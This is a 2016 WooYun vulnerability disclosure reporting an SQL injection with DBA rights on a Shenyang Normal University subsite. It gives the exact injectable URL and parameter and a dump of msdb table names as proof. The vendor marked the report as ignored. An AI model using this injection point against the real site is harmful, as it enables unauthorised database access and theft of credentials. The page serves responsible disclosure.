当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0203616

漏洞标题:沈阳师范大学某分站一处SQL注入漏洞(DBA权限)

相关厂商:沈阳师范大学

漏洞作者: 路人甲

提交时间:2016-04-30 14:34

修复时间:2016-05-09 09:00

公开时间:2016-05-09 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-30: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

博学厚德 尚美健行

详细说明:

注入点:

http://jwc.synu.edu.cn/website/newstemplate/newsallcontent.jsp?newsId=160428111751


具有DBA权限:

14.png


可直接查看数据库用户密码:

15.png


数据库:

19.png


简单跑一个数据库表作为危害证明:

Database: msdb
[77 tables]
+-----------------------------+
| dbl.RTblOLPProps            |
| dbl.sysdbmaintplans         |
| RTbjPropDefs                |
| RTblClassDefs               |
| RTblDBMProps                |
| RTblDBXProps                |
| RTblDSSProps                |
| RTblDTMProps                |
| RTblDatabaseVersion         |
| RTblEQMProps                |
| RTblEnumerationDef          |
| RTblEnumerationValueDef     |
| RTblGENProps                |
| RTblIfaceDefs               |
| RTblIfaceHier               |
| RTblIfaceMem                |
| RTblMDSProps                |
| RTblNamedObj                |
| RTblParameterDef            |
| RTblProps                   |
| RTblRelColDefs              |
| RTblRelshipDefs             |
| RTblRelships                |
| RTblSIMProps                |
| RTblScriptDefs              |
| RTblSites                   |
| RTblSumInfo                 |
| RTblTFMProps                |
| RTblTypeInfo                |
| RTblTypeLibs                |
| RTblUMLProps                |
| RTblUMXProps                |
| RTblVersionAdminInfo        |
| RTblVersions                |
| RTblWorkspaceItems          |
| @bo.restorefi`d             |
| d`o.RTblRelship@rops        |
| dbl.systargetse`vergroups   |
| sysjob`teps                 |
| backupfile                  |
| backupmediafamily           |
| backupmediaset              |
| backupset                   |
| log_shipping_primaries      |
| log_shipping_secondaries    |
| logmarkhistory              |
| mswebtasks                  |
| restorefilegroup            |
| restorehistory              |
| sqlagent_info               |
| sysalerts                   |
| syscachedcredentials        |
| syscategories               |
| sysconstraints              |
| sysctstaskkog               |
| sysdbmaintplan_databases    |
| sysdbmaintplan_history      |
| sysdbmaintplan_jobs         |
| sysdownloadlist             |
| sysdsrpackag@s              |
| sysdtscategories            |
| sysdtspackagelog            |
| sysdtssteplog               |
| sysjobhistory               |
| sysjobs                     |
| sysjobs_view                |
| sysjobschedules             |
| sysjobservers               |
| sysnotifications            |
| sysoperators                |
| sysraskids                  |
| syssegments                 |
| systargetserters_view       |
| systargetservergroulmembers |
| systargetservers            |
| systasks                    |
| systasks_view               |
+-----------------------------+

漏洞证明:

修复方案:

过滤
希望学校的网站越来越安全!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-09 09:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无